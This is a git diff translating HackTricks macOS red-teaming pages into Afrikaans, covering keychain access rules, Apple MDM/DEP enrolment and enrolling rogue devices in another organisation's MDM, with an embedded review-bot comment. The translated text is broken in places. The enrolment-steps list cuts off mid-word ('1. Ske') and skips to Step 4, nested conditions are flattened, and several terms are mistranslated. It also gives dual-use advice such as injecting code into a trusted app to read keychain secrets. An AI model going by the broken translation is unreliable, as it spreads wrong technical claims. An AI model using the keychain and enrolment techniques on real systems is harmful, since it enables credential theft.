die geheime inligting te verkry) +* Benodig kodehandtekening om ooreen te stem met **PartitionID** +* Benodig kodehandtekening om ooreen te stem met dié van een **vertroude toepassing** (of wees 'n lid van die regte KeychainAccessGroup) +* As **alle programme vertrou** word: +* Benodig die toepaslike **magtigings** +* Benodig kodehandtekening om ooreen te stem met **PartitionID** +* As daar **geen PartitionID** is, is dit nie nodig nie {% hint style="danger" %} -Therefore, if there is **1 application listed**, you need to **inject code in that application**. +Daarom, as daar **1 aansoek gelys** word, moet jy **kode in daardie aansoek inspuit**. -If **apple** is indicated in the **partitionID**, you could access it with **`osascript`** so anything that is trusting all applications with apple in the partitionID. **`Python`** could also be used for this. +As **apple** aangedui word in die **partitionID**, kan jy dit met **`osascript`** toegang kry, sodat enige iets wat alle programme met apple in die partitionID vertrou. **`Python`** kan ook hiervoor gebruik word. {% endhint %} -### Two additional attributes +### Twee addisionele eienskappe -* **Invisible**: It's a boolean flag to **hide** the entry from the **UI** Keychain app -* **General**: It's to store **metadata** (so it's NOT ENCRYPTED) - * Microsoft was storing in plain text all the refresh tokens to access sensitive endpoint. +* **Onsigbaar**: Dit is 'n booleaanse vlag om die inskrywing van die **UI** Sleutelketting-toepassing te **versteek** +* **Algemeen**: Dit is om **metadata** te stoor (dit is NIE VERSLEUTELD nie) +* Microsoft het al die verfrissingsnommers om toegang tot sensitiewe eindpunte te verkry, in platte teks gestoor. -## References +## Verwysings * [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
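Review bot: the nested lists in this hunk are flattened: the `kSecReturnData` to `kSecClass` attributes, the `Beskrywing` / `Vertroude Aansoeklys` items with their app, binary and group sub-items, and the "Benodig ..." requirements under "As daar 1+ vertroude programme gelys word" and "As alle programme vertrou word" all lose the four-space indentation of the removed lines and become top-level bullets, so the requirements no longer read as conditions of the case above them. Restore the indentation. "Vertroude Aansoeklys" and "as daar 1 aansoek gelys word, moet jy kode in daardie aansoek inspuit" use "aansoek" (a written application or request) where the rest of the patch uses "toepassing" for a software application. "verfrissingsnommers" for "refresh tokens" means "refresh numbers"; keep "refresh tokens" or use "verfris-tokens". "sleutelketting" here versus "Sleutelbos" in the headings of the same file. The blank line before `### APIs` is removed for no reason.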
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/README.md b/macos-hardening/macos-red-teaming/macos-mdm/README.md index 24002a521..c99ad0b84 100644 --- a/macos-hardening/macos-red-teaming/macos-mdm/README.md +++ b/macos-hardening/macos-red-teaming/macos-mdm/README.md @@ -2,226 +2,189 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-**To learn about macOS MDMs check:** +**Om meer te leer oor macOS MDM's, kyk na:** * [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU) * [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe) -## Basics +## Basiese beginsels -### **MDM (Mobile Device Management) Overview** -[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) is utilized for overseeing various end-user devices like smartphones, laptops, and tablets. Particularly for Apple's platforms (iOS, macOS, tvOS), it involves a set of specialized features, APIs, and practices. The operation of MDM hinges on a compatible MDM server, which is either commercially available or open-source, and must support the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). Key points include: +### **MDM (Mobile Device Management) Oorsig** +[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) word gebruik om verskeie eindgebruikerstoestelle soos slimfone, draagbare rekenaars en tablette te bestuur. Veral vir Apple se platforms (iOS, macOS, tvOS) behels dit 'n stel gespesialiseerde funksies, API's en praktyke. Die werking van MDM steun op 'n verenigbare MDM-bediener, wat of kommersieel beskikbaar is of oopbron is, en moet die [MDM-protokol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) ondersteun. Sleutelpunte sluit in: -- Centralized control over devices. -- Dependence on an MDM server that adheres to the MDM protocol. -- Capability of the MDM server to dispatch various commands to devices, for instance, remote data erasure or configuration installation. +- Gekentraliseerde beheer oor toestelle. +- Afhanklikheid van 'n MDM-bediener wat die MDM-protokol nakom. 
+- Die vermoë van die MDM-bediener om verskeie opdragte na toestelle te stuur, byvoorbeeld verwydering van afgelewerde data of konfigurasie-installasie. -### **Basics of DEP (Device Enrollment Program)** -The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) offered by Apple streamlines the integration of Mobile Device Management (MDM) by facilitating zero-touch configuration for iOS, macOS, and tvOS devices. DEP automates the enrollment process, allowing devices to be operational right out of the box, with minimal user or administrative intervention. Essential aspects include: +### **Basiese beginsels van DEP (Device Enrollment Program)** +Die [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) wat deur Apple aangebied word, vereenvoudig die integrasie van Mobile Device Management (MDM) deur outomatiese konfigurasie vir iOS-, macOS- en tvOS-toestelle te fasiliteer. DEP outomatiseer die registrasieproses, sodat toestelle reguit uit die boks gebruik kan word, met minimale gebruikers- of administratiewe ingryping. Belangrike aspekte sluit in: -- Enables devices to autonomously register with a pre-defined MDM server upon initial activation. -- Primarily beneficial for brand-new devices, but also applicable for devices undergoing reconfiguration. -- Facilitates a straightforward setup, making devices ready for organizational use swiftly. +- Stel toestelle in staat om outomaties by 'n voorafbepaalde MDM-bediener te registreer by aanvanklike aktivering. +- Hoofsaaklik voordelig vir splinternuwe toestelle, maar ook toepaslik vir toestelle wat herkonfigurasie ondergaan. +- Vereenvoudig 'n maklike opstelling, sodat toestelle vinnig gereed is vir organisatoriese gebruik. -### **Security Consideration** -It's crucial to note that the ease of enrollment provided by DEP, while beneficial, can also pose security risks. 
If protective measures are not adequately enforced for MDM enrollment, attackers might exploit this streamlined process to register their device on the organization's MDM server, masquerading as a corporate device. +### **Veiligheidsoorwegings** +Dit is belangrik om daarop te let dat die maklike registrasie wat deur DEP gebied word, terwyl dit voordelig is, ook sekuriteitsrisiko's kan inhou. As beskermingsmaatreëls nie behoorlik afgedwing word vir MDM-registrasie nie, kan aanvallers hierdie vereenvoudigde proses benut om hul toestel op die organisasie se MDM-bediener te registreer en as 'n korporatiewe toestel voor te gee. {% hint style="danger" %} -**Security Alert**: Simplified DEP enrollment could potentially allow unauthorized device registration on the organization's MDM server if proper safeguards are not in place. +**Veiligheidswaarskuwing**: Vereenvoudigde DEP-registrasie kan potensieel ongemagtigde toestelregistrasie op die organisasie se MDM-bediener toelaat as behoorlike veiligheidsmaatreëls nie in plek is nie. {% endhint %} -### Basics What is SCEP (Simple Certificate Enrolment Protocol)? +### Basiese beginsels Wat is SCEP (Simple Certificate Enrolment Protocol)? -* A relatively old protocol, created before TLS and HTTPS were widespread. -* Gives clients a standardized way of sending a **Certificate Signing Request** (CSR) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate. +* 'n Relatief ou protokol, geskep voordat TLS en HTTPS wydverspreid was. +* Gee kliënte 'n gestandaardiseerde manier om 'n **Certificate Signing Request** (CSR) te stuur om 'n sertifikaat toegeken te word. Die kliënt sal die bediener vra om hom 'n ondertekende sertifikaat te gee. -### What are Configuration Profiles (aka mobileconfigs)? +### Wat is Konfigurasieprofiel (aka mobileconfigs)? -* Apple’s official way of **setting/enforcing system configuration.** -* File format that can contain multiple payloads. 
-* Based on property lists (the XML kind). -* “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018. +* Apple se amptelike manier om **sisteme-konfigurasie in te stel/af te dwing**. +* Lêerformaat wat verskeie ladinge kan bevat. +* Gebaseer op eiendomslyste (die XML-soort). +* "kan onderteken en versleutel word om hul oorsprong te valideer, hul integriteit te verseker en hul inhoud te beskerm." Basics — Bladsy 70, iOS Security Guide, Januarie 2018. -## Protocols +## Protokolle ### MDM -* Combination of APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers) -* **Communication** occurs between a **device** and a server associated with a **device** **management** **product** -* **Commands** delivered from the MDM to the device in **plist-encoded dictionaries** -* All over **HTTPS**. MDM servers can be (and are usually) pinned. -* Apple grants the MDM vendor an **APNs certificate** for authentication +* Kombinasie van APNs (**Apple-bedieners**) + RESTful API (**MDM-vennoot**-bedieners) +* **Kommunikasie** vind plaas tussen 'n **toestel** en 'n bediener wat verband hou met 'n **toestelbestuursproduk** +* **Opdragte** word van die MDM na die toestel gestuur in **plist-gekodeerde woordeboeke** +* Alles oor **HTTPS**. MDM-bedieners kan (en word gewoonlik) vasgemaak. +* Apple verleen die MDM-vennoot 'n **APNs-sertifikaat** vir verifikasie ### DEP -* **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity (undocumented): - * The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices. - * The [DEP API used by Apple Authorized Resellers](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) to enroll devices, check enrollment status, and check transaction status. 
- * The undocumented private DEP API. This is used by Apple Devices to request their DEP profile. On macOS, the `cloudconfigurationd` binary is responsible for communicating over this API. -* More modern and **JSON** based (vs. plist) -* Apple grants an **OAuth token** to the MDM vendor +* **3 API's**: 1 vir wederverkopers, 1 vir MDM-vennote, 1 vir toestelidentiteit (ondokumenteer): +* Die sogenaamde [DEP "wolkmeganisme" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). Dit word deur MDM-bedieners gebruik om DEP-profiel met spesifieke toestelle te assosieer. +* Die [DEP API wat deur Apple Gemagtigde Wederverkopers gebruik word](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html) om toestelle in te skryf, inskrywingsstatus te kontroleer en transaksiestatus te kontroleer. +* Die ongedokumenteerde private DEP API. Dit word deur Apple-toestelle gebruik om hul DEP-profiel aan te vra. Op macOS is die `cloudconfigurationd` binêre verantwoordelik vir kommunikasie oor hierdie API. +* Meer moderne en **JSON**-gebaseerd (vs. plist) +* Apple verleen 'n **OAuth-token** aan die MDM-vennoot -**DEP "cloud service" API** +**DEP "wolkmeganisme" API** * RESTful -* sync device records from Apple to the MDM server -* sync “DEP profiles” to Apple from the MDM server (delivered by Apple to the device later on) -* A DEP “profile” contains: - * MDM vendor server URL - * Additional trusted certificates for server URL (optional pinning) - * Extra settings (e.g. which screens to skip in Setup Assistant) +* sink toestelrekords van Apple na die MDM-bediener +* sink "DEP-profiel" na Apple van die MDM-bediener (later deur Apple aan die toestel afgelewer) +* 'n DEP "profiel" bevat: +* MDM-vennoot-bediener-URL +* Addisionele vertrouensertifikate vir bediener-URL (opsionele vaspen) +* Ekstra instellings (bv. 
watter skerms om oor te slaan in die Assistent vir Opstelling) -## Serial Number +## Serienommer -Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**. +Apple-toestelle wat na 2010 vervaardig is, het oor die algemeen **12-karakter alfanumeriese** serienommers, met die **eerste drie syfers wat die vervaardigingsplek** verteenwoordig, die volgende **twee** wat die **jaar** en **week** van vervaardiging aandui, die volgende **drie** syfers wat 'n **unieke identifiseerder** verskaf, en die **laaste** **vier** syfers wat die **modelnommer** verteenwoordig. {% content-ref url="macos-serial-number.md" %} [macos-serial-number.md](macos-serial-number.md) {% endcontent-ref %} -## Steps for enrolment and management +## Stappe vir inskrywing en bestuur -1. Device record creation (Reseller, Apple): The record for the new device is created -2. Device record assignment (Customer): The device is assigned to a MDM server -3. Device record sync (MDM vendor): MDM sync the device records and push the DEP profiles to Apple -4. DEP check-in (Device): Device gets his DEP profile -5. Profile retrieval (Device) -6. Profile installation (Device) a. incl. MDM, SCEP and root CA payloads -7. MDM command issuance (Device) +1. Ske +### Stap 4: DEP kontrole - Kry die Aktiveringsrekord -![](<../../../.gitbook/assets/image (564).png>) - -The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process. 
- -### Step 4: DEP check-in - Getting the Activation Record - -This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe) +Hierdie deel van die proses gebeur wanneer 'n **gebruiker 'n Mac vir die eerste keer opstart** (of na 'n volledige uitvee) ![](<../../../.gitbook/assets/image (568).png>) -or when executing `sudo profiles show -type enrollment` +of wanneer die `sudo profiles show -type enrollment` uitgevoer word -* Determine **whether device is DEP enabled** -* Activation Record is the internal name for **DEP “profile”** -* Begins as soon as the device is connected to Internet -* Driven by **`CPFetchActivationRecord`** -* Implemented by **`cloudconfigurationd`** via XPC. The **"Setup Assistant**" (when the device is firstly booted) or the **`profiles`** command will **contact this daemon** to retrieve the activation record. - * LaunchDaemon (always runs as root) +* Bepaal **of die toestel DEP-geaktiveer is** +* Aktiveringsrekord is die interne naam vir die **DEP "profiel"** +* Begin sodra die toestel aan die internet gekoppel is +* Gedryf deur **`CPFetchActivationRecord`** +* Geïmplementeer deur **`cloudconfigurationd`** via XPC. Die **"Setup Assistant**" (wanneer die toestel eerste keer opgestart word) of die **`profiles`** opdrag sal **hierdie daemon kontak** om die aktiveringsrekord te kry. +* LaunchDaemon (loop altyd as root) -It follows a few steps to get the Activation Record performed by **`MCTeslaConfigurationFetcher`**. This process uses an encryption called **Absinthe** +Dit volg 'n paar stappe om die Aktiveringsrekord uit te voer deur **`MCTeslaConfigurationFetcher`**. Hierdie proses maak gebruik van 'n versleuteling genaamd **Absinthe** -1. Retrieve **certificate** - 1. GET [https://iprofiles.apple.com/resource/certificate.cer](https://iprofiles.apple.com/resource/certificate.cer) -2. **Initialize** state from certificate (**`NACInit`**) - 1. Uses various device-specific data (i.e. 
**Serial Number via `IOKit`**) -3. Retrieve **session key** - 1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) -4. Establish the session (**`NACKeyEstablishment`**) -5. Make the request - 1. POST to [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) sending the data `{ "action": "RequestProfileConfiguration", "sn": "" }` - 2. The JSON payload is encrypted using Absinthe (**`NACSign`**) - 3. All requests over HTTPs, built-in root certificates are used +1. Kry **sertifikaat** +1. Kry [https://iprofiles.apple.com/resource/certificate.cer](https://iprofiles.apple.com/resource/certificate.cer) +2. **Inisialiseer** toestand vanaf sertifikaat (**`NACInit`**) +1. Gebruik verskillende toestel-spesifieke data (bv. **Serienommer via `IOKit`**) +3. Kry **sessiesleutel** +1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) +4. Stel die sessie op (**`NACKeyEstablishment`**) +5. Doen die versoek +1. POST na [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) en stuur die data `{ "action": "RequestProfileConfiguration", "sn": "" }` +2. Die JSON-lading word versleutel met Absinthe (**`NACSign`**) +3. Alle versoek word oor HTTPs gestuur, ingeboude rootsertifikate word gebruik ![](<../../../.gitbook/assets/image (566).png>) -The response is a JSON dictionary with some important data like: +Die respons is 'n JSON-woordeboek met belangrike data soos: -* **url**: URL of the MDM vendor host for the activation profile -* **anchor-certs**: Array of DER certificates used as trusted anchors +* **url**: URL van die MDM-leweransier-gashuis vir die aktiveringsprofiel +* **anchor-certs**: Array van DER-sertifikate wat as vertroude ankers gebruik word -### **Step 5: Profile Retrieval** +### **Stap 5: Profiel ophaling** ![](<../../../.gitbook/assets/image (567).png>) -* Request sent to **url provided in DEP profile**. 
-* **Anchor certificates** are used to **evaluate trust** if provided. - * Reminder: the **anchor\_certs** property of the DEP profile -* **Request is a simple .plist** with device identification - * Examples: **UDID, OS version**. -* CMS-signed, DER-encoded -* Signed using the **device identity certificate (from APNS)** -* **Certificate chain** includes expired **Apple iPhone Device CA** +* Versoek gestuur na **url wat in DEP-profiel verskaf is**. +* **Ankersertifikate** word gebruik om vertroue te **evalueer** indien verskaf. +* Onthou: die **anchor\_certs** eienskap van die DEP-profiel +* **Versoek is 'n eenvoudige .plist** met toestelidentifikasie +* Voorbeelde: **UDID, OS-weergawe**. +* CMS-onderteken, DER-gekodeer +* Onderteken met die **toestelidentiteitsertifikaat (van APNS)** +* **Sertifikaatketting** sluit verstreke **Apple iPhone Device CA** in -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png>) -### Step 6: Profile Installation +### Stap 6: Profielinstallasie -* Once retrieved, **profile is stored on the system** -* This step begins automatically (if in **setup assistant**) -* Driven by **`CPInstallActivationProfile`** -* Implemented by mdmclient over XPC - * LaunchDaemon (as root) or LaunchAgent (as user), depending on context -* Configuration profiles have multiple payloads to install -* Framework has a plugin-based architecture for installing profiles -* Each payload type is associated with a plugin - * Can be XPC (in framework) or classic Cocoa (in ManagedClient.app) -* 
Example: - * Certificate Payloads use CertificateService.xpc +* Sodra dit opgehaal is, word die **profiel op die stelsel gestoor** +* Hierdie stap begin outomaties (as in die **opstellingsassistent**) +* Gedryf deur **`CPInstallActivationProfile`** +* Geïmplementeer deur mdmclient oor XPC +* LaunchDaemon (as root) of LaunchAgent (as gebruiker), afhangende van die konteks +* Konfigurasieprofiel het verskeie ladinge om te installeer +* Die raamwerk het 'n plugin-gebaseerde argitektuur vir die installeer van profiele +* Elke ladingstipe is geassosieer met 'n plugin +* Dit kan XPC (in die raamwerk) of klassieke Cocoa (in ManagedClient.app) wees +* Voorbeeld: +* Sertifikaatladinge gebruik CertificateService.xpc -Typically, **activation profile** provided by an MDM vendor will **include the following payloads**: +Gewoonlik sal die **aktiveringsprofiel** wat deur 'n MDM-leweransier verskaf word, die volgende ladinge insluit: -* `com.apple.mdm`: to **enroll** the device in MDM -* `com.apple.security.scep`: to securely provide a **client certificate** to the device. -* `com.apple.security.pem`: to **install trusted CA certificates** to the device’s System Keychain. -* Installing the MDM payload equivalent to **MDM check-in in the documentation** -* Payload **contains key properties**: +* `com.apple.mdm`: om die toestel in MDM te **registreer** +* `com.apple.security.scep`: om 'n **kliëntsertifikaat** veilig aan die toestel te voorsien. +* `com.apple.security.pem`: om vertroude CA-sertifikate in die toestel se Stelsel Sleutelketting te **installeer**. 
+* Installeer die MDM-lading wat gelykstaande is aan **MDM-kontrole in die dokumentasie** +* Lading bevat **sleutel eienskappe**: * - * MDM Check-In URL (**`CheckInURL`**) - * MDM Command Polling URL (**`ServerURL`**) + APNs topic to trigger it -* To install MDM payload, request is sent to **`CheckInURL`** -* Implemented in **`mdmclient`** -* MDM payload can depend on other payloads -* Allows **requests to be pinned to specific certificates**: - * Property: **`CheckInURLPinningCertificateUUIDs`** - * Property: **`ServerURLPinningCertificateUUIDs`** - * Delivered via PEM payload -* Allows device to be attributed with an identity certificate: - * Property: IdentityCertificateUUID - * Delivered via SCEP payload +* MDM Kontrole URL (**`CheckInURL`**) +* MDM Opdragopvraag URL (**`ServerURL`**) + APNs-onderwerp om dit te aktiveer +* Om MDM-lading te installeer, word 'n versoek gestuur na **`CheckInURL`** +* Geïmplementeer in **`mdmclient`** +* MDM-lading kan afhang van ander ladinge +* Maak dit moontlik om **versoeke aan spesifieke sertifikate te koppel**: +* Eienskap: **`CheckInURLPinningCertificateUUIDs`** +* Eienskap: **`ServerURLPinningCertificateUUIDs`** +* Afgelewer via PEM-lading +* Maak dit moontlik om die toestel aan 'n identiteitsertifikaat te koppel: +* Eienskap: IdentityCertificateUUID +* Afgelewer via SCEP-lading -### **Step 7: Listening for MDM commands** +### **Stap 7: Luister vir MDM-opdragte** -* After MDM check-in is complete, vendor can **issue push notifications using APNs** -* Upon receipt, handled by **`mdmclient`** -* To poll for MDM commands, request is sent to ServerURL -* Makes use of previously installed MDM payload: - * **`ServerURLPinningCertificateUUIDs`** for pinning request - * **`IdentityCertificateUUID`** for TLS client certificate - -## Attacks - -### Enrolling Devices in Other Organisations - -As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is 
needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ -Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected: - -{% content-ref url="enrolling-devices-in-other-organisations.md" %} -[enrolling-devices-in-other-organisations.md](enrolling-devices-in-other-organisations.md) -{% endcontent-ref %} - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+* Nadat MDM-kontrole voltooi is, kan die leweransier **push-meldings uitreik deur APNs te gebruik** +* Wanneer ontvang, hanteer deur **`mdmclient`** +* Om vir MDM-opdragte te vra, word 'n versoek gestuur na ServerURL +* Maak gebruik van voorheen geïnstalleerde MDM-lading: +* **`ServerURLPinningCertificateUUIDs`** vir koppeling van versoek +* **`IdentityCertificateUUID`** vir TLS-kliëntsertifikaat diff --git a/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md b/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md index 7ce217390..bbde2c76a 100644 --- a/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md +++ b/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md @@ -1,82 +1,82 @@ -# Enrolling Devices in Other Organisations +# Inskrywing van Toestelle in Ander Organisasies
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Intro +## Inleiding -As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ -Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected. +Soos [**voorheen genoem**](./#what-is-mdm-mobile-device-management)**,** is dit nodig om 'n toestel in 'n organisasie in te skryf **slegs 'n Serienommer wat aan daardie Organisasie behoort**. Sodra die toestel ingeskryf is, sal verskeie organisasies sensitiewe data op die nuwe toestel installeer: sertifikate, programme, WiFi-wagwoorde, VPN-konfigurasies [en so aan](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ +Dit kan dus 'n gevaarlike toegangspunt vir aanvallers wees as die inskrywingsproses nie korrek beskerm word nie. -**The following is a summary of the research [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe). Check it for further technical details!** +**Die volgende is 'n opsomming van die navorsing [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe). Kyk daarvoor vir verdere tegniese besonderhede!** -## Overview of DEP and MDM Binary Analysis +## Oorsig van DEP en MDM Binêre Analise -This research delves into the binaries associated with the Device Enrollment Program (DEP) and Mobile Device Management (MDM) on macOS. Key components include: +Hierdie navorsing ondersoek die binêre lêers wat verband hou met die Device Enrollment Program (DEP) en Mobile Device Management (MDM) op macOS. 
